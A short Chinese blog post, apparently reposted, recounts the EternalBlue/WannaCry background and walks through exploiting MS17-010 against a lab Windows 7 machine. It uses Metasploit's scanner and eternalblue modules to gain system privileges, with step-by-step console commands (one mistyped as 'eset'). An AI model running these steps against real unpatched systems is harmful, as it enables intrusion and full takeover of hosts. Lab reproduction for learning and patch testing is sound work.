永恒之藍 MS17-010漏洞復現
一:簡介
永恒之藍是指2017年4月14日晚,黑客團體Shadow Brokers(影子經紀人)公布一大批網路攻擊工具,其中包含“永恒之藍”工具,“永恒之藍”利用Windows系統的SMB漏洞可以獲取系統最高權限,5月12日,不法分子通過改造“永恒之藍”制作了wannacry勒索病毒,英國、俄羅斯、整個歐洲以及中國國內多個高校校內網、大型企業內網和政府機構專網中招,被勒索支付高額贖金才能解密恢復檔案,
永恒之藍漏洞是方程式組織在其漏洞利用框架中一個針對SMB服務進行攻擊的漏洞,該漏洞導致攻擊者在目標系統上可以執行任意代碼,
二:復現
目標IP:192.168.23.174
這個靶機是我前幾個月網上下載的,普通的win7鏡像,完全沒想到居然也有永恒之藍漏洞,本來想測驗一下有沒有,居然真的有

第一步:
打開kali,輸入msfconsole 打開msf工具

第二步:search ms17_010 搜索這個漏洞的所有模塊
scanner 表示掃描探測,我們可以先探測目標有沒有這個漏洞

第三步:利用上面1這個模塊
輸入 use auxiliary/scanner/smb/smb_ms17_010
設定目標ip: eset RHOSTS 192.168.23.174
開始探測:exploit

表示很有可能有這么漏洞:

第四步:
back 回傳上一級
search ms17_010
use exploit/windows/smb/ms17_010_eternalblue //使用攻擊模塊攻擊
average 表示優先推薦使用

設定目標ip,和上面掃描一樣
set RHOSTS ip
show options //查看選項

exploit //開始攻擊

攻擊成功拿到系統權限

注意: 這個實驗有時候會導致目標主機的重啟,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/214881.html
標籤:其他
